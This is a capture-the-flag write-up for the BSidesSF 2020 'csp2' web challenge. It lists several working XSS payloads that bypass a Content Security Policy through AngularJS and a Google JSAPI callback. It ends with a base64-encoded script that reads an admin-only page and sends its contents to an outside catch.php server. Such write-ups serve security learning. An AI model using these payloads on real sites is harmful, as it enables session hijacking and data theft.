csp2 [web]
BSidesSF 2020

csp2

Round two: Can you bypass the CSP? Try to read /csp-two-flag as admin, all payloads submitted here will be sent to the admin.

https://csp-2-2446d5a3.challenges.bsidessf.net/

Recon

CSP header:

content-security-policy: script-src 'self' ajax.googleapis.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report

It seems we can load src's from ajax.googleapis.com, let's see what we can do with that.

Working XSS 1:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script><div ng-app ng-csp id=p ng-click=$event.view.alert(1337)><script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

Source: https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22

Working XSS 2:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script src=prototype/1.7.2.0/prototype.js></script>{{$on.curry.call().alert(1337)}}

Working XSS 3:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp id=p ng-click="x=$event.view.window;x.alert(1)">
<script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

Working XSS 4:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp id=p ng-click='x=$event.view.window;x.alert("AAA");y=x.atob("YWxlcnQoIkFOVVMiKQ==");x.eval(y)'>
<script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

Solution:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp id=p ng-click='x=$event.view.window;y=x.atob("dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwp4aHIub3BlbignR0VUJywgJ2h0dHBzOi8vY3NwLTItMjQ0NmQ1YTMuY2hhbGxlbmdlcy5ic2lkZXNzZi5uZXQvY3NwLXR3by1mbGFnJywgdHJ1ZSk7Cnhoci5zZXRSZXF1ZXN0SGVhZGVyKCdDb250ZW50LXR5cGUnLCAnYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkJyk7Cnhoci5vbmxvYWQgPSBmdW5jdGlvbiAoKSB7CnZhciByZXF1ZXN0ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CnJlcXVlc3Qub3BlbignR0VUJywgJ2h0dHBzOi8vaGF3a2plLm5ldC9jYXRjaC5waHA/Yz0nK3hoci5yZXNwb25zZVRleHQsIHRydWUpOwpyZXF1ZXN0LnNlbmQoKQp9Owp4aHIuc2VuZCgpOw==");x.eval(y)'>
<script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

The base64 blob decoded is:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://csp-2-2446d5a3.challenges.bsidessf.net/csp-two-flag', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
var request = new XMLHttpRequest();
request.open('GET', 'https://xxx.net/catch.php?c='+xhr.responseText, true);
request.send()
};
xhr.send();

Flag

CTF{Canned_Spam_Perfection}